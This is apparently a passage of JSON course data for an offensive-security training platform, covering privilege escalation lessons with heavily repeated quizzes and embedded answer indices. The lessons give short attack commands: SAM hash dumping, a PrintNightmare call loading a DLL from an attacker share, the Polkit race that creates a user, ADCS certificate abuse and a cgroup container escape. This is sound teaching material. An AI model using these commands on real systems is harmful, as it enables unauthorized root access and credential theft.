unquoted service path is exploitable when...","opts":["The path is short","The path has spaces and no quotes","The service is disabled","The binary is encrypted"],"ans":1},{"type":"quiz","q":"Docker group membership gives root because...","opts":["Docker is setuid","Docker daemon runs as root and can mount host paths","Docker encrypts everything","Docker modifies /etc/passwd"],"ans":1},{"type":"quiz","q":"What does 'find / -writable' find?","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"SeImpersonatePrivilege on Windows allows...","opts":["File deletion","Token impersonation attacks (Potato)","Registry editing","Network scanning"],"ans":1},{"type":"quiz","q":"cron jobs run as which user?","opts":["Always root","The user who owns the crontab","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What tool checks for Windows privesc vectors?","opts":["nmap","WinPEAS / PowerUp","Wireshark","Burp Suite"],"ans":1},{"type":"quiz","q":"NFS no_root_squash allows...","opts":["Anonymous access","Remote root to create files as root","Encryption","Compression"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1}]},{"id":"pe-systemd","cat":"Privilege Escalation","title":"Systemd Service Exploitation","diff":2,"xp":150,"intro":"Writable service files = code exec as root.","sections":[{"type":"text","content":"Modify ExecStart in writable .service files."},{"type":"code","lang":"bash","content":"find / -name '*.service' -writable 2>/dev/null\n# Edit ExecStart= to run payload\nsudo systemctl daemon-reload && sudo systemctl restart vuln"},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS output."},{"type":"quiz","q":"Writable service files allow...","opts":["Log viewing","Code execution as the service user","Network scanning","File encryption"],"ans":1},{"type":"quiz","q":"PATH hijacking works when a script uses...","opts":["Absolute paths","Relative command names without full paths","Environment variables","File descriptors"],"ans":1},{"type":"quiz","q":"SUID bit means the binary runs as...","opts":["The current user","The file owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"What file contains Linux user password hashes?","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"Windows stores local hashes in...","opts":["NTDS.dit","SAM database","Registry","Event logs"],"ans":1},{"type":"quiz","q":"Which command checks sudo permissions?","opts":["sudo -s","sudo -l","sudo -v","sudo -u"],"ans":1},{"type":"quiz","q":"Kernel exploits are risky because...","opts":["They're slow","They can crash the entire system","They require network access","They need GUI"],"ans":1},{"type":"quiz","q":"What is a capability in Linux?","opts":["A user group","A fine-grained root privilege","A file permission","A process state"],"ans":1},{"type":"quiz","q":"WinPEAS and LinPEAS are...","opts":["Exploit frameworks","Privilege escalation enumeration scripts","Password crackers","Network scanners"],"ans":1},{"type":"quiz","q":"An unquoted service path is exploitable when...","opts":["The path is short","The path has spaces and no quotes","The service is disabled","The binary is encrypted"],"ans":1},{"type":"quiz","q":"Docker group membership gives root because...","opts":["Docker is setuid","Docker daemon runs as root and can mount host paths","Docker encrypts everything","Docker modifies /etc/passwd"],"ans":1},{"type":"quiz","q":"What does 'find / -writable' find?","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"SeImpersonatePrivilege on Windows allows...","opts":["File deletion","Token impersonation attacks (Potato)","Registry editing","Network scanning"],"ans":1},{"type":"quiz","q":"cron jobs run as which user?","opts":["Always root","The user who owns the crontab","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What tool checks for Windows privesc vectors?","opts":["nmap","WinPEAS / PowerUp","Wireshark","Burp Suite"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1}]},{"id":"pe-sam-dump","cat":"Privilege Escalation","title":"SAM Hive Extraction","diff":2,"xp":150,"intro":"Dump local Windows password hashes.","sections":[{"type":"text","content":"reg save or Volume Shadow Copy to extract SAM and SYSTEM."},{"type":"code","lang":"bash","content":"reg save HKLMSAM SAM\nreg save HKLMSYSTEM SYSTEM\nimpacket-secretsdump -sam SAM -system SYSTEM LOCAL"},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS output."},{"type":"quiz","q":"SAM is protected by...","opts":["Encryption only","A lock held by the running OS","File permissions","A password"],"ans":1},{"type":"quiz","q":"SUID bit means the binary runs as...","opts":["The current user","The file owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"What file contains Linux user password hashes?","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"Windows stores local hashes in...","opts":["NTDS.dit","SAM database","Registry","Event logs"],"ans":1},{"type":"quiz","q":"Which command checks sudo permissions?","opts":["sudo -s","sudo -l","sudo -v","sudo -u"],"ans":1},{"type":"quiz","q":"Kernel exploits are risky because...","opts":["They're slow","They can crash the entire system","They require network access","They need GUI"],"ans":1},{"type":"quiz","q":"What is a capability in Linux?","opts":["A user group","A fine-grained root privilege","A file permission","A process state"],"ans":1},{"type":"quiz","q":"WinPEAS and LinPEAS are...","opts":["Exploit frameworks","Privilege escalation enumeration scripts","Password crackers","Network scanners"],"ans":1},{"type":"quiz","q":"An unquoted service path is exploitable when...","opts":["The path is short","The path has spaces and no quotes","The service is disabled","The binary is encrypted"],"ans":1},{"type":"quiz","q":"Docker group membership gives root because...","opts":["Docker is setuid","Docker daemon runs as root and can mount host paths","Docker encrypts everything","Docker modifies /etc/passwd"],"ans":1},{"type":"quiz","q":"What does 'find / -writable' find?","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"SeImpersonatePrivilege on Windows allows...","opts":["File deletion","Token impersonation attacks (Potato)","Registry editing","Network scanning"],"ans":1},{"type":"quiz","q":"cron jobs run as which user?","opts":["Always root","The user who owns the crontab","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What tool checks for Windows privesc vectors?","opts":["nmap","WinPEAS / PowerUp","Wireshark","Burp Suite"],"ans":1},{"type":"quiz","q":"NFS no_root_squash allows...","opts":["Anonymous access","Remote root to create files as root","Encryption","Compression"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1}]},{"id":"pe-shared-lib","cat":"Privilege Escalation","title":"Shared Library Hijacking","diff":3,"xp":200,"intro":"Hijack library loading in SUID binaries.","sections":[{"type":"text","content":"Create a malicious .so that gets loaded before the real one."},{"type":"code","lang":"bash","content":"strace /usr/sbin/suid-binary 2>&1 | grep 'No such file'\n# Create evil.so with constructor that spawns shell\ngcc -shared -fPIC -o libcustom.so evil.c"},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS output."},{"type":"quiz","q":"Library hijacking exploits...","opts":["Buffer overflows","The dynamic linker's search order","Network protocols","File permissions"],"ans":1},{"type":"quiz","q":"PATH hijacking works when a script uses...","opts":["Absolute paths","Relative command names without full paths","Environment variables","File descriptors"],"ans":1},{"type":"quiz","q":"SUID bit means the binary runs as...","opts":["The current user","The file owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"What file contains Linux user password hashes?","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"Windows stores local hashes in...","opts":["NTDS.dit","SAM database","Registry","Event logs"],"ans":1},{"type":"quiz","q":"Which command checks sudo permissions?","opts":["sudo -s","sudo -l","sudo -v","sudo -u"],"ans":1},{"type":"quiz","q":"Kernel exploits are risky because...","opts":["They're slow","They can crash the entire system","They require network access","They need GUI"],"ans":1},{"type":"quiz","q":"What is a capability in Linux?","opts":["A user group","A fine-grained root privilege","A file permission","A process state"],"ans":1},{"type":"quiz","q":"WinPEAS and LinPEAS are...","opts":["Exploit frameworks","Privilege escalation enumeration scripts","Password crackers","Network scanners"],"ans":1},{"type":"quiz","q":"An unquoted service path is exploitable when...","opts":["The path is short","The path has spaces and no quotes","The service is disabled","The binary is encrypted"],"ans":1},{"type":"quiz","q":"Docker group membership gives root because...","opts":["Docker is setuid","Docker daemon runs as root and can mount host paths","Docker encrypts everything","Docker modifies /etc/passwd"],"ans":1},{"type":"quiz","q":"What does 'find / -writable' find?","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"SeImpersonatePrivilege on Windows allows...","opts":["File deletion","Token impersonation attacks (Potato)","Registry editing","Network scanning"],"ans":1},{"type":"quiz","q":"cron jobs run as which user?","opts":["Always root","The user who owns the crontab","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What tool checks for Windows privesc vectors?","opts":["nmap","WinPEAS / PowerUp","Wireshark","Burp Suite"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1}]},{"id":"pe-printnightmare","cat":"Privilege Escalation","title":"PrintNightmare","diff":3,"xp":250,"intro":"Print Spooler RCE for instant SYSTEM.","sections":[{"type":"text","content":"Load a malicious DLL via the Spooler service."},{"type":"code","lang":"bash","content":"python3 CVE-2021-1675.py domain/user:pass@target '\\attackershareevil.dll'"},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS output."},{"type":"quiz","q":"PrintNightmare exploits...","opts":["Windows Update","Print Spooler","DNS Client","Task Scheduler"],"ans":1},{"type":"quiz","q":"SUID bit means the binary runs as...","opts":["The current user","The file owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"What file contains Linux user password hashes?","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"Windows stores local hashes in...","opts":["NTDS.dit","SAM database","Registry","Event logs"],"ans":1},{"type":"quiz","q":"Which command checks sudo permissions?","opts":["sudo -s","sudo -l","sudo -v","sudo -u"],"ans":1},{"type":"quiz","q":"Kernel exploits are risky because...","opts":["They're slow","They can crash the entire system","They require network access","They need GUI"],"ans":1},{"type":"quiz","q":"What is a capability in Linux?","opts":["A user group","A fine-grained root privilege","A file permission","A process state"],"ans":1},{"type":"quiz","q":"WinPEAS and LinPEAS are...","opts":["Exploit frameworks","Privilege escalation enumeration scripts","Password crackers","Network scanners"],"ans":1},{"type":"quiz","q":"An unquoted service path is exploitable when...","opts":["The path is short","The path has spaces and no quotes","The service is disabled","The binary is encrypted"],"ans":1},{"type":"quiz","q":"Docker group membership gives root because...","opts":["Docker is setuid","Docker daemon runs as root and can mount host paths","Docker encrypts everything","Docker modifies /etc/passwd"],"ans":1},{"type":"quiz","q":"What does 'find / -writable' find?","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"SeImpersonatePrivilege on Windows allows...","opts":["File deletion","Token impersonation attacks (Potato)","Registry editing","Network scanning"],"ans":1},{"type":"quiz","q":"cron jobs run as which user?","opts":["Always root","The user who owns the crontab","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What tool checks for Windows privesc vectors?","opts":["nmap","WinPEAS / PowerUp","Wireshark","Burp Suite"],"ans":1},{"type":"quiz","q":"NFS no_root_squash allows...","opts":["Anonymous access","Remote root to create files as root","Encryption","Compression"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1}]},{"id":"pe-polkit","cat":"Privilege Escalation","title":"Polkit CVE-2021-3560","diff":3,"xp":250,"intro":"Race condition in Polkit authorization.","sections":[{"type":"text","content":"Kill the dbus request mid-flight to bypass authorization."},{"type":"code","lang":"bash","content":"dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:hacker string:'Hacker' int32:1 & sleep 0.005s; kill $!"},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS output."},{"type":"quiz","q":"CVE-2021-3560 is a...","opts":["Buffer overflow","Race condition","SQL injection","XSS"],"ans":1},{"type":"quiz","q":"SUID bit means the binary runs as...","opts":["The current user","The file owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"What file contains Linux user password hashes?","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"Windows stores local hashes in...","opts":["NTDS.dit","SAM database","Registry","Event logs"],"ans":1},{"type":"quiz","q":"Which command checks sudo permissions?","opts":["sudo -s","sudo -l","sudo -v","sudo -u"],"ans":1},{"type":"quiz","q":"Kernel exploits are risky because...","opts":["They're slow","They can crash the entire system","They require network access","They need GUI"],"ans":1},{"type":"quiz","q":"What is a capability in Linux?","opts":["A user group","A fine-grained root privilege","A file permission","A process state"],"ans":1},{"type":"quiz","q":"WinPEAS and LinPEAS are...","opts":["Exploit frameworks","Privilege escalation enumeration scripts","Password crackers","Network scanners"],"ans":1},{"type":"quiz","q":"An unquoted service path is exploitable when...","opts":["The path is short","The path has spaces and no quotes","The service is disabled","The binary is encrypted"],"ans":1},{"type":"quiz","q":"Docker group membership gives root because...","opts":["Docker is setuid","Docker daemon runs as root and can mount host paths","Docker encrypts everything","Docker modifies /etc/passwd"],"ans":1},{"type":"quiz","q":"What does 'find / -writable' find?","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"SeImpersonatePrivilege on Windows allows...","opts":["File deletion","Token impersonation attacks (Potato)","Registry editing","Network scanning"],"ans":1},{"type":"quiz","q":"cron jobs run as which user?","opts":["Always root","The user who owns the crontab","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What tool checks for Windows privesc vectors?","opts":["nmap","WinPEAS / PowerUp","Wireshark","Burp Suite"],"ans":1},{"type":"quiz","q":"NFS no_root_squash allows...","opts":["Anonymous access","Remote root to create files as root","Encryption","Compression"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1}]},{"id":"pe-adcs","cat":"Privilege Escalation","title":"ADCS Certificate Abuse","diff":4,"xp":300,"intro":"Exploit misconfigured cert templates for domain admin.","sections":[{"type":"text","content":"Enrollee supplies subject + Client Auth EKU + low-priv enrollment = impersonate anyone."},{"type":"code","lang":"bash","content":"certipy find -u user@domain -p pass -dc-ip DC -vulnerable\ncertipy req -u user -p pass -ca 'Corp-CA' -template VulnTemplate -upn administrator@domain"},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS output."},{"type":"quiz","q":"ESC1 requires a template with...","opts":["Strong encryption","Enrollee supplies subject + Client Auth + low-priv enrollment","Admin only","Short validity"],"ans":1},{"type":"quiz","q":"SUID bit means the binary runs as...","opts":["The current user","The file owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"What file contains Linux user password hashes?","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"Windows stores local hashes in...","opts":["NTDS.dit","SAM database","Registry","Event logs"],"ans":1},{"type":"quiz","q":"Which command checks sudo permissions?","opts":["sudo -s","sudo -l","sudo -v","sudo -u"],"ans":1},{"type":"quiz","q":"Kernel exploits are risky because...","opts":["They're slow","They can crash the entire system","They require network access","They need GUI"],"ans":1},{"type":"quiz","q":"What is a capability in Linux?","opts":["A user group","A fine-grained root privilege","A file permission","A process state"],"ans":1},{"type":"quiz","q":"WinPEAS and LinPEAS are...","opts":["Exploit frameworks","Privilege escalation enumeration scripts","Password crackers","Network scanners"],"ans":1},{"type":"quiz","q":"An unquoted service path is exploitable when...","opts":["The path is short","The path has spaces and no quotes","The service is disabled","The binary is encrypted"],"ans":1},{"type":"quiz","q":"Docker group membership gives root because...","opts":["Docker is setuid","Docker daemon runs as root and can mount host paths","Docker encrypts everything","Docker modifies /etc/passwd"],"ans":1},{"type":"quiz","q":"What does 'find / -writable' find?","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"SeImpersonatePrivilege on Windows allows...","opts":["File deletion","Token impersonation attacks (Potato)","Registry editing","Network scanning"],"ans":1},{"type":"quiz","q":"cron jobs run as which user?","opts":["Always root","The user who owns the crontab","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What tool checks for Windows privesc vectors?","opts":["nmap","WinPEAS / PowerUp","Wireshark","Burp Suite"],"ans":1},{"type":"quiz","q":"NFS no_root_squash allows...","opts":["Anonymous access","Remote root to create files as root","Encryption","Compression"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1}]},{"id":"pe-container-escape","cat":"Privilege Escalation","title":"Advanced Container Escape","diff":5,"xp":300,"intro":"Break out of hardened containers.","sections":[{"type":"text","content":"cgroup release_agent, user namespaces, kernel vulns from containers."},{"type":"code","lang":"bash","content":"# CVE-2022-0492 cgroup escape\nmkdir /tmp/cgrp && mount -t cgroup cgroup /tmp/cgrp\necho 1 > /tmp/cgrp/x/notify_on_release\necho /cmd > /tmp/cgrp/release_agent"},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS output."},{"type":"quiz","q":"Cgroup escape uses...","opts":["iptables","A script executed by the kernel when the cgroup empties","Container settings","DNS tunneling"],"ans":1},{"type":"quiz","q":"SUID bit means the binary runs as...","opts":["The current user","The file owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"What file contains Linux user password hashes?","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"Windows stores local hashes in...","opts":["NTDS.dit","SAM database","Registry","Event logs"],"ans":1},{"type":"quiz","q":"Which command checks sudo permissions?","opts":["sudo -s","sudo -l","sudo -v","sudo -u"],"ans":1},{"type":"quiz","q":"Kernel exploits are risky because...","opts":["They're slow","They can crash the entire system","They require network access","They need GUI"],"ans":1},{"type":"quiz","q":"What is a capability in Linux?","opts":["A user group","A fine-grained root privilege","A file permission","A process state"],"ans":1},{"type":"quiz","q":"WinPEAS and LinPEAS are...","opts":["Exploit frameworks","Privilege escalation enumeration scripts","Password crackers","Network scanners"],"ans":1},{"type":"quiz","q":"An unquoted service path is exploitable when...","opts":["The path is short","The path has spaces and no quotes","The service is disabled","The binary is encrypted"],"ans":1},{"type":"quiz","q":"Docker group membership gives root because...","opts":["Docker is setuid","Docker daemon runs as root and can mount host paths","Docker encrypts everything","Docker modifies /etc/passwd"],"ans":1},{"type":"quiz","q":"What does 'find / -writable' find?","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"SeImpersonatePrivilege on Windows allows...","opts":["File deletion","Token impersonation attacks (Potato)","Registry editing","Network scanning"],"ans":1},{"type":"quiz","q":"cron jobs run as which user?","opts":["Always root","The user who owns the crontab","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What tool checks for Windows privesc vectors?","opts":["nmap","WinPEAS / PowerUp","Wireshark","Burp Suite"],"ans":1},{"type":"quiz","q":"NFS no_root_squash allows...","opts":["Anonymous access","Remote root to create files as root","Encryption","Compression"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1}]},{"id":"ex-payload-encode","cat":"Exploitation","title":"Payload Encoding","diff":2,"xp":150,"intro":"Encode payloads for filter bypass.","sections":[{"type":"text","content":"Base64, URL, Unicode, hex encoding evades basic detection."},{"type":"code","lang":"bash","content":"echo -n 'id' | base64\n# Double URL encode: ' -> %27 -> %2527"},{"type":"text","content":"Understanding HOW exploits work separates professionals from script kiddies. Every overflow teaches memory layout, every injection teaches parsing."},{"type":"tip","content":"Read the exploit source or CVE advisory before running it. Know what it sends, what it triggers, and what happens on failure."},{"type":"task","content":"Walk through a buffer overflow manually: find crash, 